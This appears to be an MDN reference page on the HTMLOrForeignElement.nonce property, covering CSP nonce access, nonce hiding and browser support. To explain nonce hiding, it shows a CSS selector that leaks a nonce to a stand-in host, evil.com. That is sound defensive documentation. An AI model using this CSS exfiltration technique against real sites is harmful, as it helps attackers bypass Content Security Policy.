The nonce
property of the HTMLOrForeignElement
interface returns the cryptographic number used once that is used by Content Security Policy to determine whether a given fetch will be allowed to proceed.
In later implementations, elements only expose their nonce
attribute to scripts (and not to side-channels like CSS attribute selectors).
Examples
Retrieving a nonce value
In the past, not all browsers supported the nonce
IDL attribute, so a workaround is to try to use getAttribute
as a fallback:
let nonce = script['nonce'] || script.getAttribute('nonce');
However, recent browsers version hide nonce
values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']
) will be the only way to access nonces.
Nonce hiding helps preventing that attackers exfiltrate nonce data via mechanisms that can grab data from content attributes like this:
script[nonce~=whatever] {
background: url("https://evil.com/nonce?whatever");
}
Specifications
Specification |
---|
HTML Living StandardThe definition of 'nonce' in that specification. |
Browser Compatibility
The compatibility table on this page is generated from structured data. If you'd like to contribute to the data, please check out https://github.com/mdn/browser-compat-data and send us a pull request.
Update compatibility data on GitHub
Desktop | Mobile | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|
nonce
|
Chrome
Full support 61 |
Edge
Full support 79 |
Firefox
Full support 75 |
IE
No support No |
Opera
Full support Yes |
Safari
Full support 10 |
WebView Android
Full support 61 |
Chrome Android
Full support 61 |
Firefox Android
No support No |
Opera Android
Full support Yes |
Safari iOS
Full support 10 |
Samsung Internet Android
Full support 8.0 |
Legend
- Full support
- Full support
- No support
- No support
See also
HTMLOrForeignElement.nonce by Mozilla Contributors is licensed under CC-BY-SA 2.5.